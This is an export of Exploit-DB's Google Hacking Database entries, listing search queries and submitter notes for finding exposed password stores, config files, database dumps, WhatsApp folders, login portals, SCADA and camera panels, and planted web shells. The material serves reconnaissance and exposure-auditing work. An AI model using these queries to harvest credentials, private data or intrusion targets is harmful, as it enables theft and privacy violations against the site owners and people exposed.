intext:\"iCloud Photos\" OR intext:\"My Photo Stream\" OR intext:\"Camera Roll\"", "textualDescription": "From: Creep Mode Baby" }, { "signatureReferenceNumber": "4021", "link": "https://www.exploit-db.com/ghdb/4021/", "category": "Sensitive Directories", "querystring": "http://www.google.com/search?q=intitle:\"index of\" inurl:\"no-ip.com\"", "shortDescription": "intitle:\"index of\" inurl:\"no-ip.com\"", "textualDescription": "# Exploit Title: intitle:\"index of\" inurl:\"no-ip.com\"\n# Google Dork: intitle:\"index of\" inurl:\"no-ip.com\"\n# Date: 17/06/2015\n# Exploit Author: Sphearis\n# Vendor Homepage: NA\n# Software Link: NA\n# Version: NA\n# Tested on: ALL\n# CVE : NA\n\nThis dork allows you to browse files stored on a personal server(home)\nusing a dynamic dns service to update server IP.\nYou can replace \"no-ip.com\" with any other dynamic dns hosts:\n\"dyndns.org\"\n\"ddns.net\"\n\"dynamic-dns.net\"\n\"dynip.com\"\n\"tzo.com\"\n\nAnd so on..." }, { "signatureReferenceNumber": "4022", "link": "https://www.exploit-db.com/ghdb/4022/", "category": "Pages containing login portals", "querystring": "http://www.google.com/search?q=Auth inurl:welcome ext:cgi", "shortDescription": "Auth inurl:welcome ext:cgi", "textualDescription": "A lot of Pages with logins portals.\nEnjoy.\nBy Rootkit." }, { "signatureReferenceNumber": "4023", "link": "https://www.exploit-db.com/ghdb/4023/", "category": "Footholds", "querystring": "http://www.google.com/search?q=ext:asp intext:Smart.Shell 1.0 BY P0Uy@_$3r\\/3R -", "shortDescription": "ext:asp intext:Smart.Shell 1.0 BY P0Uy@_$3r\\/3R -", "textualDescription": "A new WebShell interesting. Have Fun.\nBy Rootkit." }, { "signatureReferenceNumber": "4024", "link": "https://www.exploit-db.com/ghdb/4024/", "category": "Web Server Detection", "querystring": "http://www.google.com/search?q=filetype:asmx inurl:(_vti_bin|api|webservice)", "shortDescription": "filetype:asmx inurl:(_vti_bin|api|webservice)", "textualDescription": "this dork will return web service ." }, { "signatureReferenceNumber": "4025", "link": "https://www.exploit-db.com/ghdb/4025/", "category": "Pages containing login portals", "querystring": "http://www.google.com/search?q=inurl:Citrix/MetaframeXP", "shortDescription": "inurl:Citrix/MetaframeXP", "textualDescription": "Servers Citrix web xD.\nBy Rootkit." }, { "signatureReferenceNumber": "4026", "link": "https://www.exploit-db.com/ghdb/4026/", "category": "Files containing juicy info", "querystring": "http://www.google.com/search?q=\"signons.sqlite\" intitle:\"index of\"", "shortDescription": "\"signons.sqlite\" intitle:\"index of\"", "textualDescription": "\"signons.sqlite\" intitle:\"index of\"\n\nThis dork finds firefox profiles and other softwares that use the similar\nformat that you can grab and put in your own firefox or other installation\nand reveal all passwords saved, history, bookmarks, saved cookies and\npretty much everything! When you get hacked using this method it feels like\nyou are getting hacked by a whole team.\n\nby _sNapper\n-- \n\"The answer to every problem is One.\" -- Myself\n--\n\"Life is like war, for the most part--planning it is useless.\" -- Myself" }, { "signatureReferenceNumber": "4027", "link": "https://www.exploit-db.com/ghdb/4027/", "category": "Sensitive Directories", "querystring": "http://www.google.com/search?q=intitle:\"Index of\" \"wwwroot\"", "shortDescription": "intitle:\"Index of\" \"wwwroot\"", "textualDescription": "Directory of wwwroot Dork. Enjoy xD.\nBy Rootkit." }, { "signatureReferenceNumber": "4028", "link": "https://www.exploit-db.com/ghdb/4028/", "category": "Files containing juicy info", "querystring": "http://www.google.com/search?q=\"Futon on Apache\" inurl:_utils", "shortDescription": "\"Futon on Apache\" inurl:_utils", "textualDescription": "Exposed CouchDB admin panels\n\nBy Gabor Szathmari" }, { "signatureReferenceNumber": "4029", "link": "https://www.exploit-db.com/ghdb/4029/", "category": "Files containing juicy info", "querystring": "http://www.google.com/search?q=intext:SET SQL_MODE=\"NO_AUTO_VALUE_ON_ZERO\"; = ext:txt", "shortDescription": "phpMyAdmin SQL Dump", "textualDescription": "# Exploit Title: [phpMyAdmin SQL Dump]\n# Google Dork: [intext:SET SQL_MODE=\"NO_AUTO_VALUE_ON_ZERO\"; = ext:txt]\n# Date: [6/29/2015]\n# Exploit Author: [Daz Holmes]" }, { "signatureReferenceNumber": "4030", "link": "https://www.exploit-db.com/ghdb/4030/", "category": "Files containing passwords", "querystring": "http://www.google.com/search?q=site:pastebin.com intext:Username", "shortDescription": "site:pastebin.com intext:Username", "textualDescription": "# Exploit Title: [site:pastebin.com intext:Username]\n# Google Dork: [Pastebin Username & Password]\n# Date: [6/29/2015]\n# Exploit Author: [Daz Holmes]" }, { "signatureReferenceNumber": "4031", "link": "https://www.exploit-db.com/ghdb/4031/", "category": "Files containing juicy info", "querystring": "http://www.google.com/search?q=inurl:access.cnf ext:cnf", "shortDescription": "inurl:access.cnf ext:cnf", "textualDescription": "File vulnerability, reveals the path of Password Server. Have fun.\nThis Dork is present By Rootkit." }, { "signatureReferenceNumber": "4032", "link": "https://www.exploit-db.com/ghdb/4032/", "category": "Files containing juicy info", "querystring": "http://www.google.com/search?q=intext:OLD_FOREIGN_KEY_CHECKS\"; = ext:txt", "shortDescription": "intext:OLD_FOREIGN_KEY_CHECKS\"; = ext:txt", "textualDescription": "Google dork Description: MySQL dumpGoogle search: intext:OLD_FOREIGN_KEY_CHECKS\"; = ext:txt\n\nby TN-N3SQU1K :)" }, { "signatureReferenceNumber": "4033", "link": "https://www.exploit-db.com/ghdb/4033/", "category": "Sensitive Directories", "querystring": "http://www.google.com/search?q=intitle:index.of.pubs", "shortDescription": "intitle:index.of.pubs", "textualDescription": "Exploit title: intitle:index.of.pubs\nDescription: intitle:index.of.pubs\nSensitive Directories\nAuthor:fidah.org" }, { "signatureReferenceNumber": "4034", "link": "https://www.exploit-db.com/ghdb/4034/", "category": "Various Online Devices", "querystring": "http://www.google.com/search?q=inurl:\"/certsrv\" intext:\"Select a task\"", "shortDescription": "inurl:\"/certsrv\" intext:\"Select a task\"", "textualDescription": "Microsoft Certificate Request Webpage.\n\nAuthor: Felipe Molina (@felmoltor)" }, { "signatureReferenceNumber": "4035", "link": "https://www.exploit-db.com/ghdb/4035/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=inurl:courier/web/ inurl:wmLogin.html filetype:html", "shortDescription": "inurl:courier/web/ inurl:wmLogin.html filetype:html", "textualDescription": "Identifies Accellion Secure File Transfer servers that may be vulnerable to\nhttps://community.rapid7.com/community/metasploit/blog/2015/07/10/r7-2015-08-accellion-file-transfer-appliance-vulnerabilities-cve-2015-2856-cve-2015-2857\n\n@lanmaster53" }, { "signatureReferenceNumber": "4038", "link": "https://www.exploit-db.com/ghdb/4038/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=inurl:EndUserPortal.jsp", "shortDescription": "inurl:EndUserPortal.jsp", "textualDescription": "inurl:EndUserPortal.jsp \nIt takes you it brings up login pages for the service desk. \n\nhttps://www.exploit-db.com/exploits/37667/\n\nAuthor: NumLock90" }, { "signatureReferenceNumber": "4036", "link": "https://www.exploit-db.com/ghdb/4036/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=inurl:\"index.php\" intext:\"ApPHP Hotel Site\" -site:\"apphp.com\"", "shortDescription": "inurl:\"index.php\" intext:\"ApPHP Hotel Site\" -site:\"apphp.com\"", "textualDescription": "Dork Identifies the sites with ApPHP-Hotel-Site 3.x.x vulnerable to sql\ninjection.\n\nhttps://packetstormsecurity.com/files/132369/ApPHP-Hotel-Site-3.x.x-SQL-Injection.html\n\nRegards,\nKaran Ramani" }, { "signatureReferenceNumber": "4037", "link": "https://www.exploit-db.com/ghdb/4037/", "category": "Various Online Devices", "querystring": "http://www.google.com/search?q=allinurl:awstats.pl ext:pl", "shortDescription": "allinurl:awstats.pl ext:pl", "textualDescription": "A lot of Panels with Statics Advanced. Enjoy.\nBy Rootkit." }, { "signatureReferenceNumber": "4039", "link": "https://www.exploit-db.com/ghdb/4039/", "category": "Files containing juicy info", "querystring": "http://www.google.com/search?q=inurl:wp-admin/admin-ajax.php inurl:wp-config.php", "shortDescription": "inurl:wp-admin/admin-ajax.php inurl:wp-config.php", "textualDescription": "The dork 'inurl:wp-admin/admin-ajax.php inurl:wp-config.php' finds the\n'wp-config.php' file. It contains information about the database,\nincluding the name, host (typically localhost), username, and password.\nThis information allows WordPress to communicate with the database to store\nand retrieve data (e.g. Posts, Users, Settings, etc).\n\nName: Suyog Pawar." }, { "signatureReferenceNumber": "4040", "link": "https://www.exploit-db.com/ghdb/4040/", "category": "Files containing passwords", "querystring": "http://www.google.com/search?q=intext:@pwcache \"parent directory\"", "shortDescription": "intext:@pwcache \"parent directory\"", "textualDescription": "intext:@pwcache \"parent directory\"\n\nBest regards,\nAdam Bedard" }, { "signatureReferenceNumber": "4041", "link": "https://www.exploit-db.com/ghdb/4041/", "category": "Pages containing login portals", "querystring": "http://www.google.com/search?q=intitle:\"InterWorx-CP\" \"Forgot your password\"", "shortDescription": "intitle:\"InterWorx-CP\" \"Forgot your password\"", "textualDescription": "InterWorx Web Hosting Control Panel login pages.\n\n- Andy G - twitter.com/vxhex" }, { "signatureReferenceNumber": "4042", "link": "https://www.exploit-db.com/ghdb/4042/", "category": "Pages containing login portals", "querystring": "http://www.google.com/search?q=site:.mil + inurl:login.aspx | .asp | .html | .php | .htm", "shortDescription": "site:.mil + inurl:login.aspx | .asp | .html | .php | .htm", "textualDescription": "*Google Search : site:.mil + inurl:login.aspx | .asp | .html | .php | .htm\n\nZeel Chavda" }, { "signatureReferenceNumber": "4043", "link": "https://www.exploit-db.com/ghdb/4043/", "category": "Various Online Devices", "querystring": "http://www.google.com/search?q=allinurl:foldercontent.html?folder=", "shortDescription": "allinurl:foldercontent.html?folder=", "textualDescription": "Devices of NAS Iomega Cloud Services.\nEnjoy!!!.\nBy Rootkit." }, { "signatureReferenceNumber": "4044", "link": "https://www.exploit-db.com/ghdb/4044/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=inurl:/plugins/aviary-image-editor-add-on-for-gravity-forms/", "shortDescription": "inurl:/plugins/aviary-image-editor-add-on-for-gravity-forms/", "textualDescription": "www.exploit-db.com/exploits/37275/\nDork: inurl:/plugins/aviary-image-editor-add-on-for-gravity-forms/\n\n\nsincerely,\nZeel Chavda" }, { "signatureReferenceNumber": "4045", "link": "https://www.exploit-db.com/ghdb/4045/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=inurl:/wp-content/plugins/inboundio-marketing/", "shortDescription": "inurl:/wp-content/plugins/inboundio-marketing/", "textualDescription": "https://www.exploit-db.com/exploits/36478/\nGoogle Dork : inurl:/wp-content/plugins/inboundio-marketing/\n\n\nsincerely,\nZeel Chavda" }, { "signatureReferenceNumber": "4046", "link": "https://www.exploit-db.com/ghdb/4046/", "category": "Sensitive Directories", "querystring": "http://www.google.com/search?q=intext:index of sym", "shortDescription": "intext:index of sym", "textualDescription": "Dork: intext:index of sym\n\nMost of hacker use auto server symlink script and grab all the config file\nof the server. Most of the script create a folder that name is sym. All\nconfig file stored in this folder.\n\n\nThank You\nAtik Rahman" }, { "signatureReferenceNumber": "4047", "link": "https://www.exploit-db.com/ghdb/4047/", "category": "Files containing juicy info", "querystring": "http://www.google.com/search?q=intext:\"Full path to a .htpasswd file in this dir:\" filetype:php", "shortDescription": "intext:\"Full path to a .htpasswd file in this dir:\" filetype:php", "textualDescription": "Files containing Juicy information from web online tools for generating .htpasswd and giving full web path .\n\nby - l1kw1d" }, { "signatureReferenceNumber": "4048", "link": "https://www.exploit-db.com/ghdb/4048/", "category": "Files containing juicy info", "querystring": "http://www.google.com/search?q=inurl:cgi-bin ext:pl intext:\"-rwxr-xr-x\"", "shortDescription": "inurl:cgi-bin ext:pl intext:\"-rwxr-xr-x\"", "textualDescription": "List of Directories of Unix and Linux webs.\nEnjoy!.\nBy Rootkit." }, { "signatureReferenceNumber": "4049", "link": "https://www.exploit-db.com/ghdb/4049/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=allinurl:wp-content/plugins/wptf-image-gallery/", "shortDescription": "allinurl:wp-content/plugins/wptf-image-gallery/", "textualDescription": "Description:- Aribtrary File Download Vuln.\nExploit :- www.exploit-db.com/exploits/37751/\nGoogle :- allinurl:wp-content/plugins/wptf-image-gallery/\n\n\nSincerely,\n\nZeel Chavda" }, { "signatureReferenceNumber": "4050", "link": "https://www.exploit-db.com/ghdb/4050/", "category": "Various Online Devices", "querystring": "http://www.google.com/search?q=inurl:\"/squid-reports/\" AND intitle:\"SARG reports\"", "shortDescription": "inurl:\"/squid-reports/\" AND intitle:\"SARG reports\"", "textualDescription": "Search the Sarg monitoring graphs of Web Proxy SQUID3\n\nIng. Daniel Maldonado\nhttp://www.caceriadespammers.com.ar" }, { "signatureReferenceNumber": "4051", "link": "https://www.exploit-db.com/ghdb/4051/", "category": "Various Online Devices", "querystring": "http://www.google.com/search?q=intitle:\"hp laserjet\" inurl:SSI/Auth/set_config_deviceinfo.htm", "shortDescription": "intitle:\"hp laserjet\" inurl:SSI/Auth/set_config_deviceinfo.htm", "textualDescription": "# Exploit Title: Unprotected HP Laserjets\n# Google Dork: intitle:\"hp laserjet\" inurl:SSI/Auth/set_config_deviceinfo.htm\n# Date: 15/08/2015\n# Exploit Author: Anonymous\n\nChange default password or add your own password as the printers come without a password which allows others to mess with settings and print various things." }, { "signatureReferenceNumber": "4052", "link": "https://www.exploit-db.com/ghdb/4052/", "category": "Files containing juicy info", "querystring": "http://www.google.com/search?q=intext:/homedir/.cpanel-datastore/", "shortDescription": "intext:/homedir/.cpanel-datastore/", "textualDescription": "intext:/homedir/.cpanel-datastore dork displays publicly accessible and\nindexed cpanel datastores.\n\nEnjoy, Zapperlink" }, { "signatureReferenceNumber": "4053", "link": "https://www.exploit-db.com/ghdb/4053/", "category": "Files containing juicy info", "querystring": "http://www.google.com/search?q=intext:bbdd index.of \"/\" \"Parent Directory\"", "shortDescription": "intext:bbdd index.of \"/\" \"Parent Directory\"", "textualDescription": "Databases directory info. Have Fun!\n\nRootkit." }, { "signatureReferenceNumber": "4054", "link": "https://www.exploit-db.com/ghdb/4054/", "category": "Footholds", "querystring": "http://www.google.com/search?q=intitle:SN0X SHELL: WEEEEEEEEEEEEEEEEED", "shortDescription": "intitle:SN0X SHELL: WEEEEEEEEEEEEEEEEED", "textualDescription": "Google Dork that brings up ddos shell" }, { "signatureReferenceNumber": "4055", "link": "https://www.exploit-db.com/ghdb/4055/", "category": "Files containing juicy info", "querystring": "http://www.google.com/search?q=filetype:pac inurl:\"/proxy\"", "shortDescription": "filetype:pac inurl:\"/proxy\"", "textualDescription": "Search the Web Proxy Autodiscovery Protocol\n\nIng. Daniel Maldonadohttp://www.caceriadespammers.com.ar" }, { "signatureReferenceNumber": "4056", "link": "https://www.exploit-db.com/ghdb/4056/", "category": "Error Messages", "querystring": "http://www.google.com/search?q=intext:\"Unexpected Problem Occurred!\" ext:aspx", "shortDescription": "intext:\"Unexpected Problem Occurred!\" ext:aspx", "textualDescription": "This Error messages reveal a lot of info of servers. Enjoy xD.\nRootkit Pentester." }, { "signatureReferenceNumber": "4057", "link": "https://www.exploit-db.com/ghdb/4057/", "category": "Sensitive Directories", "querystring": "http://www.google.com/search?q=intitle:\"Index of\" \"DCIM\"", "shortDescription": "intitle:\"Index of\" \"DCIM\"", "textualDescription": "A lot of Camera Photos Dump.\nHave Fun!.\nRootkit." }, { "signatureReferenceNumber": "4058", "link": "https://www.exploit-db.com/ghdb/4058/", "category": "Files containing juicy info", "querystring": "http://www.google.com/search?q=inurl: mil|/issue.php filetype:xls", "shortDescription": "inurl: mil|/issue.php filetype:xls", "textualDescription": "Files containing juicy info of the involved current issuers\nAuthor : aye_robot" }, { "signatureReferenceNumber": "4059", "link": "https://www.exploit-db.com/ghdb/4059/", "category": "Pages containing login portals", "querystring": "http://www.google.com/search?q=site: edu|org + inurl:\"faculty_login.asp | .php\"", "shortDescription": "site: edu|org + inurl:\"faculty_login.asp | .php\"", "textualDescription": "Type: login portals\nAuthor : botsec0" }, { "signatureReferenceNumber": "4060", "link": "https://www.exploit-db.com/ghdb/4060/", "category": "Sensitive Directories", "querystring": "http://www.google.com/search?q=intitle:\"Index of\" \"WhatsApp Images\"", "shortDescription": "intitle:\"Index of\" \"WhatsApp Images\"", "textualDescription": "WhatsApp Images folder, usually from backups.\n\n--pmbento" }, { "signatureReferenceNumber": "4061", "link": "https://www.exploit-db.com/ghdb/4061/", "category": "Various Online Devices", "querystring": "http://www.google.com/search?q=inurl:/set_config_password.html", "shortDescription": "inurl:/set_config_password.html", "textualDescription": "Submitter: Gman The Mod-dog" }, { "signatureReferenceNumber": "4062", "link": "https://www.exploit-db.com/ghdb/4062/", "category": "Error Messages", "querystring": "http://www.google.com/search?q=intitle:Error Page pageWrapper.jsp?", "shortDescription": "intitle:Error Page pageWrapper.jsp?", "textualDescription": "\"java.lang.NullPointerException\" Error\nThanks,\nXploit" }, { "signatureReferenceNumber": "4063", "link": "https://www.exploit-db.com/ghdb/4063/", "category": "Pages containing login portals", "querystring": "http://www.google.com/search?q=intitle:IBM Lotus iNotes Login", "shortDescription": "intitle:IBM Lotus iNotes Login", "textualDescription": "Thanks,\n\nXploit" }, { "signatureReferenceNumber": "4064", "link": "https://www.exploit-db.com/ghdb/4064/", "category": "Files containing juicy info", "querystring": "http://www.google.com/search?q=inurl:src/viewcvs.cgi/log/.c?=", "shortDescription": "inurl:src/viewcvs.cgi/log/.c?=", "textualDescription": "Vulnerable CVS logs" }, { "signatureReferenceNumber": "4065", "link": "https://www.exploit-db.com/ghdb/4065/", "category": "Error Messages", "querystring": "http://www.google.com/search?q=intitle:Error-javax.el.ELException+error+xhtml", "shortDescription": "intitle:Error-javax.el.ELException+error+xhtml", "textualDescription": "An Error Occurred:\n\"javax.el.ELException\"\u00a0\n\nJava error and gives\u00a0\n\n+\u00a0Stack Trace,\u00a0+\u00a0Component Tree,\u00a0+\u00a0Scoped Variables.\u00a0\n\n-Xploit" }, { "signatureReferenceNumber": "4066", "link": "https://www.exploit-db.com/ghdb/4066/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=\"ganglia mobile.php\"", "shortDescription": "\"ganglia mobile.php\"", "textualDescription": "EDB: https://www.exploit-db.com/exploits/38030/\nCVE: CVE-2012-3448\n\nAlso:\n\nintitle:\"Ganglia Mobile\"\nintitle:\"Ganglia\" inurl:\"mobile.php\"\nintitle:\"Grid Report\" OR intitle:\"Cluster Report\" OR intitle:\"Node View\" OR intitle:\"Host Report\" OR intitle:\"Ganglia:: \"\nintitle:\"Powered by Job Monarch\"\nintext:\"Job Monarch version \"\nintext:\"Jobarchive\" intext:\"runningtime\"\ninurl:\"/addons/job_monarch\" -oss.trac.surfsara.nl\n\"Ganglia Web Frontend version 3.5.0\" - Comment: just tweak the version 3.5.0 to any valid Ganglia Web Frontend version to get results targeted to a specific version." }, { "signatureReferenceNumber": "4067", "link": "https://www.exploit-db.com/ghdb/4067/", "category": "Sensitive Directories", "querystring": "http://www.google.com/search?q=inurl:\"/cms/app/webroot\"", "shortDescription": "inurl:\"/cms/app/webroot\"", "textualDescription": "inurl:\"/cms/app/webroot\"\nAuthor:ShockvaWe (mrnoone)\n \u00f6z\u00fcm" }, { "signatureReferenceNumber": "4068", "link": "https://www.exploit-db.com/ghdb/4068/", "category": "Various Online Devices", "querystring": "http://www.google.com/search?q=intitle:\"IPCam\" inurl:monitor2.htm", "shortDescription": "intitle:\"IPCam\" inurl:monitor2.htm", "textualDescription": "EasyN IP webcam WebUI.\nCategory: Various Online devices\n\n- Fitzl Csaba" }, { "signatureReferenceNumber": "4069", "link": "https://www.exploit-db.com/ghdb/4069/", "category": "Various Online Devices", "querystring": "http://www.google.com/search?q=inurl:browse.php inurl:kcfinder -github.com", "shortDescription": "inurl:browse.php inurl:kcfinder -github.com", "textualDescription": "Panels of files for kcfinder Software. Have fun!.\nDork by Rootkit Pentester." }, { "signatureReferenceNumber": "4070", "link": "https://www.exploit-db.com/ghdb/4070/", "category": "Files containing juicy info", "querystring": "http://www.google.com/search?q=inurl:xampp inurl:perlinfo.pl ext:pl", "shortDescription": "inurl:xampp inurl:perlinfo.pl ext:pl", "textualDescription": "Panels with a lot of data for webservers.\nDork by Rootkit Pentester." }, { "signatureReferenceNumber": "4071", "link": "https://www.exploit-db.com/ghdb/4071/", "category": "Files containing juicy info", "querystring": "http://www.google.com/search?q=site:.edu | .gov ext:bkf | ext:bkp | ext:bak | ext:old | ext:backup", "shortDescription": "site:.edu | .gov ext:bkf | ext:bkp | ext:bak | ext:old | ext:backup", "textualDescription": "Dork :\nsite:.edu | .gov ext:bkf | ext:bkp | ext:bak | ext:old | ext:backup\n\nThis Will help to grab the Backup and old file of the (.gov and .edu)\nWebsite's\n\nBy : Mishra Dhiraj (D)" }, { "signatureReferenceNumber": "4072", "link": "https://www.exploit-db.com/ghdb/4072/", "category": "Files containing juicy info", "querystring": "http://www.google.com/search?q=site:target.com ext:xml | ext:conf | ext:cnf | ext:reg | ext:inf | ext:rdp | ext:cfg | ext:txt | ext:ora | ext:ini", "shortDescription": "site:target.com ext:xml | ext:conf | ext:cnf | ext:reg | ext:inf | ext:rdp | ext:cfg | ext:txt | ext:ora | ext:ini", "textualDescription": "Dork;\nsite:target.com ext:xml | ext:conf | ext:cnf | ext:reg | ext:inf | ext:rdp | ext:cfg | ext:txt | ext:ora | ext:ini\n\nThis dork will search for any configuration files a target or targets may\nhave.\nYou can change in site:target.com - to target:edu (for education targets)\n\nBy Kevin Mark" }, { "signatureReferenceNumber": "4073", "link": "https://www.exploit-db.com/ghdb/4073/", "category": "Sensitive Directories", "querystring": "http://www.google.com/search?q=intitle:\"Index of\" \"WhatsApp Databases\"", "shortDescription": "intitle:\"Index of\" \"WhatsApp Databases\"", "textualDescription": "this dork find db.crypt/.db files of whatsapp conversations\nyou can open them with\nhttps://code.google.com/p/hotoloti/downloads/detail?name=Whatsapp_Xtract_V2.1_2012-05-10-2.zip&\n\nthanks to pmbento\n--acid_burn9X" }, { "signatureReferenceNumber": "4074", "link": "https://www.exploit-db.com/ghdb/4074/", "category": "Pages containing login portals", "querystring": "http://www.google.com/search?q=intitle:Logon OrderCloud ui/logon.aspx", "shortDescription": "intitle:Logon OrderCloud ui/logon.aspx", "textualDescription": "Four51 OrderCloud Company cloud software.\nOrderCloud for shopping websites Login.\n-Xploit" }, { "signatureReferenceNumber": "4075", "link": "https://www.exploit-db.com/ghdb/4075/", "category": "Pages containing login portals", "querystring": "http://www.google.com/search?q=inurl:\"/wap/LoginPolicy.jsp\"", "shortDescription": "inurl:\"/wap/LoginPolicy.jsp\"", "textualDescription": "Stoneware webnetwork Cloud\u00a0\n\nAllows for Portal Cloud login.\n-Xploit" }, { "signatureReferenceNumber": "4076", "link": "https://www.exploit-db.com/ghdb/4076/", "category": "Pages containing login portals", "querystring": "http://www.google.com/search?q=inurl:\"remote.php/webdav\" -site:owncloud.org", "shortDescription": "inurl:\"remote.php/webdav\" -site:owncloud.org", "textualDescription": "Category: Pages Containin Login Portals\nAuthor: Felipe Molina (@femoltor)\n\nOwncloud WebDav login" }, { "signatureReferenceNumber": "4077", "link": "https://www.exploit-db.com/ghdb/4077/", "category": "Sensitive Directories", "querystring": "http://www.google.com/search?q=intitle:\"Index.of\" \"attachments\"", "shortDescription": "intitle:\"Index.of\" \"attachments\"", "textualDescription": "Directories with interesting info.\nHave Fun Responsible.\nDork by Rootkit Pentester." }, { "signatureReferenceNumber": "4078", "link": "https://www.exploit-db.com/ghdb/4078/", "category": "Error Messages", "querystring": "http://www.google.com/search?q=intitle:\"Whoops! There was an error.\"", "shortDescription": "intitle:\"Whoops! There was an error.\"", "textualDescription": "These error pages can contain database credentials.\ncontact: @geoffreyvdberge" }, { "signatureReferenceNumber": "4079", "link": "https://www.exploit-db.com/ghdb/4079/", "category": "Footholds", "querystring": "http://www.google.com/search?q=inurl:sh3llZ/c99/", "shortDescription": "inurl:sh3llZ/c99/", "textualDescription": "Through this shell you can find c99 shells uploaded on websites.\u00a0inurl:sh3llZ/c99/" }, { "signatureReferenceNumber": "4080", "link": "https://www.exploit-db.com/ghdb/4080/", "category": "Various Online Devices", "querystring": "http://www.google.com/search?q=intitle:\"WebService Web Service\" ext:asmx", "shortDescription": "intitle:\"WebService Web Service\" ext:asmx", "textualDescription": "Servers with \"Web Service commands activated\".\nDork by Rootkit Pentester." }, { "signatureReferenceNumber": "4081", "link": "https://www.exploit-db.com/ghdb/4081/", "category": "Error Messages", "querystring": "http://www.google.com/search?q=intitle:Content Server Error IdcService=DOC_INFO", "shortDescription": "intitle:Content Server Error IdcService=DOC_INFO", "textualDescription": "Oracle WebCenter Content\n\nContent Server Error\n\n\n\n-Xploit" }, { "signatureReferenceNumber": "4082", "link": "https://www.exploit-db.com/ghdb/4082/", "category": "Sensitive Directories", "querystring": "http://www.google.com/search?q=inurl:\"default.php\" intext:\"website\" \"has been successfully installed on the server!\"", "shortDescription": "inurl:\"default.php\" intext:\"website\" \"has been successfully installed on the server!\"", "textualDescription": "Dork=\u00a0inurl:\"default.php\" intext:\"website\" \"has been successfully installed on the server!\"\nDetails:\u00a0Here is a list of files and directories in your public_html folder, it bypass directory-listening restriction.\n\nSilent_z3r0Pakistan Cyber Army" }, { "signatureReferenceNumber": "4083", "link": "https://www.exploit-db.com/ghdb/4083/", "category": "Files containing juicy info", "querystring": "http://www.google.com/search?q=site:ws.kik.com | site:ws2.kik.com k=", "shortDescription": "site:ws.kik.com | site:ws2.kik.com k=", "textualDescription": "Google Dork: site:ws.kik.com | site:ws2.kik.com k=\nDate: September 16th, 2015\nExploit Author: Matthew Blankenship\nDescription: Shows usernames, emails, and verification tokens for kik messenger accounts." }, { "signatureReferenceNumber": "4084", "link": "https://www.exploit-db.com/ghdb/4084/", "category": "Various Online Devices", "querystring": "http://www.google.com/search?q=inurl:printer/main.html", "shortDescription": "inurl:printer/main.html", "textualDescription": "This Dork reveals a lot of Printers Panels.\nEnjoy with moderation xD.\nThis Dork is discovered by Rootkit Pentester." }, { "signatureReferenceNumber": "4085", "link": "https://www.exploit-db.com/ghdb/4085/", "category": "Pages containing login portals", "querystring": "http://www.google.com/search?q=intitle:Oracle PeopleSoft Sign-in \"Oracle\" Sign-in \"error\"", "shortDescription": "intitle:Oracle PeopleSoft Sign-in \"Oracle\" Sign-in \"error\"", "textualDescription": "Oracle PeopleSoft Sign-in\n\nLogins\n-Xploit" }, { "signatureReferenceNumber": "4086", "link": "https://www.exploit-db.com/ghdb/4086/", "category": "Pages containing login portals", "querystring": "http://www.google.com/search?q=inurl:imapuser Mail :: Welcome to Horde imp login.php password", "shortDescription": "inurl:imapuser Mail :: Welcome to Horde imp login.php password", "textualDescription": "Mail :: Welcome to Horde\n\nGives usernames on Horde email websites and other email websites as well.\n-Xploit" }, { "signatureReferenceNumber": "4087", "link": "https://www.exploit-db.com/ghdb/4087/", "category": "Various Online Devices", "querystring": "http://www.google.com/search?q=intitle:Global Traffic Statistics \"Ntop\"", "shortDescription": "intitle:Global Traffic Statistics \"Ntop\"", "textualDescription": "Google dork Description: View Global Traffic Statistics\nGoogle search: intitle:Global Traffic Statistics \"Ntop\"\n\nSubmited: 2015-10-3\nNote:\nNtop shows the current network usage. It displays a list of hosts that \nare currently using the network and reports information concerning the \nIP (Internet Protocol) traffic generated by each host." }, { "signatureReferenceNumber": "4088", "link": "https://www.exploit-db.com/ghdb/4088/", "category": "Various Online Devices", "querystring": "http://www.google.com/search?q=inurl:axis.cgi ext:cgi", "shortDescription": "inurl:axis.cgi ext:cgi", "textualDescription": "Dork for all axis cams. Enjoy with them!.\nThese Dork is Discovered by Rootkit Pentester." }, { "signatureReferenceNumber": "4089", "link": "https://www.exploit-db.com/ghdb/4089/", "category": "Various Online Devices", "querystring": "http://www.google.com/search?q=inurl:webvisu.htm ext:htm", "shortDescription": "inurl:webvisu.htm ext:htm", "textualDescription": "Google dork Description: View SCADA web visual interface\nGoogle search: inurl:webvisu.htm ext:htm\n\nSubmited: 2015-10-8\nNote:\nSCADA web visual. - Yudha[at]glosmon.com" }, { "signatureReferenceNumber": "4090", "link": "https://www.exploit-db.com/ghdb/4090/", "category": "Pages containing login portals", "querystring": "http://www.google.com/search?q=intitle:Parallels Plesk Panel for Microsoft Windows /login_up.php3", "shortDescription": "intitle:Parallels Plesk Panel for Microsoft Windows /login_up.php3", "textualDescription": "Login for\u00a0Parallels Plesk Panel for Microsoft Windows\n\n-Xploit" }, { "signatureReferenceNumber": "4091", "link": "https://www.exploit-db.com/ghdb/4091/", "category": "Pages containing login portals", "querystring": "http://www.google.com/search?q=inurl:agc/vicidial.php", "shortDescription": "inurl:agc/vicidial.php", "textualDescription": "This reveals the version of vicidial used and gives the access changing to\n/agc/vicidial.php to vicidial/admin.php to give the direct access to admin\nlogin page ." }, { "signatureReferenceNumber": "4092", "link": "https://www.exploit-db.com/ghdb/4092/", "category": "Web Server Detection", "querystring": "http://www.google.com/search?q=inurl:\"/web-console/\" intitle:\"Administration Console\"", "shortDescription": "inurl:\"/web-console/\" intitle:\"Administration Console\"", "textualDescription": "JBoss Application Server Info\n-Xploit" }, { "signatureReferenceNumber": "4093", "link": "https://www.exploit-db.com/ghdb/4093/", "category": "Sensitive Directories", "querystring": "http://www.google.com/search?q=mail spool intitle:index.of", "shortDescription": "mail spool intitle:index.of", "textualDescription": "Dork for mail spools.\n\nDecoy" }, { "signatureReferenceNumber": "4094", "link": "https://www.exploit-db.com/ghdb/4094/", "category": "Sensitive Directories", "querystring": "http://www.google.com/search?q=private parent intitle:index.of", "shortDescription": "private parent intitle:index.of", "textualDescription": "http://www.google.com/search?q=private parent intitle:index.of\n\nDork for all sorts of juicy 